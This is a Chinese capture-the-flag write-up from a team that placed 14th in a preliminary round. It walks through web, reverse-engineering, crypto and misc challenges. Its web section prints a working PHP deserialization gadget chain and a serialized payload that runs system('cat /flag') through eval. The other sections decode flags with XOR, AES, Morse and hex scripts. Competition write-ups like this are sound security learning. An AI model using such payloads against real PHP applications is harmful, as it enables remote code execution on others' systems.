前言

初赛名次14,太爽了,被带飞了属于是,web都是做到最后几步出不来丢给大爹🤣🤣🤣

解题情况

解题过程

Web

1.ezphp

PHP反序列化,var_dump触发BBB,通过BBB中的param1触发CCC,通过CCC中的$this->func->aaa()触发AAA执行任意代码

exp如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
<?php
highlight_file(___FILE___);  
class AAA{
    public $cmd;  
  
    public function __call($name, $arguments){
        eval($this->cmd);  
        return "done";
    }  
}

class BBB{
    public $param1;  
  
    public function __debuginfo(){
        return [
            'debugInfo' => 'param1' . $this->param1
        ];
    }  
}

class CCC{
    public $func;  
  
    public function __toString(){
        var_dump("aaa");
        $this->func->aaa();
    }  
}

// if(isset($_GET['aaa'])){  
//     $aaa = $_GET['aaa'];  
//     var_dump(unserialize($aaa));  
// }
$ccc = new CCC();
$bbb = new BBB();
$aaa = new AAA();
$aaa->cmd = "system('cat /flag');";
$ccc->func = $aaa;
$bbb->param1 = $ccc;  
echo serialize($bbb);  
  
  
?>

然后提交get参数aaa

1
?aaa=O:3:"BBB":1:{s:6:"param1";O:3:"CCC":1:{s:4:"func";O:3:"AAA":1:{s:3:"cmd";s:20:"system('cat /flag');";}}}

3.can you read flag

执行命令

tmp目录找到readflag源码

通过readflag源码发现,计算100-200次可以得出flag

PWN

RE

1.pyccc

pyc文件,使用逆向软件得到源代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
a = input('please input your flag:\n')
check = [
    102,
    109,
    99,
    100,
    127,
    52,
    114,
    88,
    97,
    122,
    85,
    125,
    105,
    127,
    119,
    80,
    120,
    112,
    98,
    39,
    109,
    52,
    55,
    106]
if len(a) == 24:
    for i in range(len(a)):
        if check[i] == ord(a[i]) ^ i:
            continue
            print(yes)

        print('nononono')
    continue
else:
    print('nononono')

发现他是对于每一个上面字符1-24的i值进行对比然后得到flag,那我们可以手动解密得到flag

1
2
3
4
5
6
check=[102,109,99,100,127,52,114,88,97,122,85,125,105,127,119,80,120,112,98,39,109,52,55,106]
flag = ""
for i in range(1,len(check)):
    flag = flag + chr(check[i]^i)
print(flag)
#flag{1t_is_very_hap4y!!}

3.easyapk

下载的附件丢到GDA里面反编译
然后找到密文和iv

密钥是,将reversecarefully中的e换成3

反编译APK,得出加密算法AES/CBC/Pkcs5 秘钥r3v3rs3car3fully IV:0123456789ABCDEF
然后aes解密得出flag

Crypto

1.小小数学家

一串数学题全部解出来68658367847012357100564949514849455056499845521025297455610049974598515698101999910250505653125

使用脚本转ascii码得到flag

1
2
3
4
5
6
7
8
9
10
11
12
13
s = '68658367847012357100564949514849455056499845521025297455610049974598515698101999910250505653125'
temp = ''

while len(s):
    if int(s[:3]) < 127:
        temp += chr(int(s[:3]))
        s = s[3:]
    else:
        temp += chr(int(s[:2]))
        s = s[2:]
print(temp)
#DASCTF{9d811301-281b-4f4a-8d1a-b38beccf2285}

MISC

1.number game

断点执行

然后赋值

然后停止断点就有个含有flag信息的弹窗

3.Ez_misc

看见一个图,发现有很熟悉的文件头FF 8D FF 0E

对应JPG文件头FF D8 FF E0

用两个脚本处理一下文件

1
2
3
4
5
6
7
8
9
10
11
12
f = open('yuanshen', "rb")  # 打开要读取的二进制文件
hex_list = ["{:02X}".format(c) for c in f.read()]  # 将文件内容转换为十六进制字符串列表
f.close()

hex_str = ''.join(hex_list)  # 将列表中的字符串连接成一个字符串
reversed_hex_str = hex_str[::-1]  # 将字符串反转

reversed_bytes = bytes.fromhex(reversed_hex_str)  # 将反转后的十六进制字符串转换为字节流

with open('4', 'wb') as f:  # 打开一个新的二进制文件,将反转后的字节流写入其中
    f.write(reversed_bytes)

1
2
3
4
with open("4","rb") as f:
    a=f.read()[::-1]
    with open("5","wb") as new:
        new.write(a)

得到jpg图片

对其使用steghide破解,得到flag.txt

1
DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DASHDOTDASHDOT DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH DASHDOTDOTDOTDOT DASHDASHDOTDOTDOT DASHDASHDOTDOTDOT DASHDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDOTDASH DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DOTDOTDOTDASHDASH DOTDOTDASHDASHDASH DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DOTDOTDOTDASHDASH DASHDASHDASHDOTDOT DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DOTDOTDOTDASHDASH DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DASHDOTDOTDOTDOT DOTDOTDOTDOTDASH DOTDOTDOTDASHDASH DASHDASHDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DASHDOTDOTDOTDOT DOTDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH DASHDASHDOTDOTDOT DASHDOTDOT

dash和dot一眼摩斯,转换一下

1
-.... -.... -.... -.-. -.... .---- -.... --... --... -... -.... ....- -.... -.... ...-- ....- -.... -.... ...-- -.... ...-- ...-- ...-- ..... -.... .---- -.... ..--- ...-- ...-- ...-- ....- ...-- ..--- -.... .---- ...-- ..... -.... ..--- ...-- ...-- -.... ..--- -.... ..--- ...-- ---.. ...-- ..... ...-- ..... -.... .---- ...-- ....- ...-- -.... ...-- ....- -.... ....- ...-- --... -.... ..--- -.... ..--- ...-- ....- -.... ..... -.... ...-- --... -..

摩斯解密得到

1
666C61677B64663466363335616233343261356233626238353561343634643762623465637D

在hex解密得到flag

flag{df4f635ab342a5b3bb855a464d7bb4ec}

结语

希望决赛还能这么顺利🎊🎊🎊